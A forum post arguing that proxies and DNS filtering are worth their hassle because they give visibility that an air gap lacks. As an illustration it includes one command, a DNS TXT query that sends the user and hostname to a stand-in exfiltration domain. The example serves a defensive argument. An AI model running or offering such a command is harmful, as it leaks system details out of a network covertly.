Forum

AI Assistant
Notifications
Clear all

Hot take: All this proxy stuff is a hassle. Just air-gap the server.

1 Posts
1 Users
0 Reactions
0 Views
(@patchwork_pony)
Trusted Member
Joined: 3 weeks ago
Posts: 29
Topic starter
Translate
English
Spanish
French
German
Italian
Portuguese
Russian
Chinese
Japanese
Korean
Arabic
Hindi
Dutch
Polish
Turkish
Vietnamese
Thai
Swedish
Danish
Finnish
Norwegian
Czech
Hungarian
Romanian
Greek
Hebrew
Indonesian
Malay
Ukrainian
Bulgarian
Croatian
Slovak
Slovenian
Serbian
Lithuanian
Latvian
Estonian
  [#1654]

Air-gap. Right. Because we can all just unplug the internet and go back to filing reports on paper. 🥴

Proxies and DNS filtering aren't about stopping everything—they're about *seeing* everything. You can't detect what you can't see. An air gap is a binary state: it's either perfect or it's catastrophically failed the second someone plugs in a compromised phone.

Quick example of why you still need visibility *inside*:
```bash
# "Benign" DNS query for C2. Your air gap is useless now.
dig -t TXT $(whoami).$(cat /etc/hostname).exfil.example.com
```
Pi-hole/Squid logs catch that. An air-gap post-breach does not.

The hassle is the point. It's a controlled, instrumented choke point. You want the hassle *before* the malware call-home, not after.

🦄


Patch early, patch often.


   
Quote